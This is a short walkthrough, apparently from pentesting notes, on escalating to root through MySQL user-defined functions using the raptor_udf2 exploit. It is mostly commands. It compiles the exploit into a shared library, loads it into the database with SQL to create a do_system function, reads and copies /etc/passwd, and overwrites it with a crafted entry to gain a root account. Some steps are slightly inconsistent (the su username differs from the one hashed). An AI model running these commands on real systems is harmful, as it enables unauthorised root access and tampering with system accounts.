Priv Esc with MySQL UDF

UDF(User Defined Functions) - Relational Database systems sometimes offer users to create functions. These can be written in any programming languages and can be used to run malicious commands on the underlying OS.

What's the requirement?

  • If the targets is running a SQL server as root without password (or can be found in config.php)

gcc -g -c 1518.c -o raptor  #compile the exploit code
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor -lc        #create the shared library (so)
use mysql;
create table foo(line blob);

insert into foo values(load_file('/tmp/raptor_udf2.so')); 
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

Once you can have confirmed that you can actually have the root power like being able to read /etc/shadow file, you can create your own passwd file (adding an account with cp)

select do_system('cat /etc/passwd > /tmp/passfile; chown j0hn j0hn /tmp/passfile');
copy the output in the passfile in your own machine -> name it passwd 
openssl passwd -crypt -salt gori gorigori #this command creates a hash for the passwd file with the username gori with password gorigori
#transfer the new password file to the target machine 
select do_system('cp /tmp/passwd /etc/passwd');
#confirm the password has been added.
su gorigori

Last updated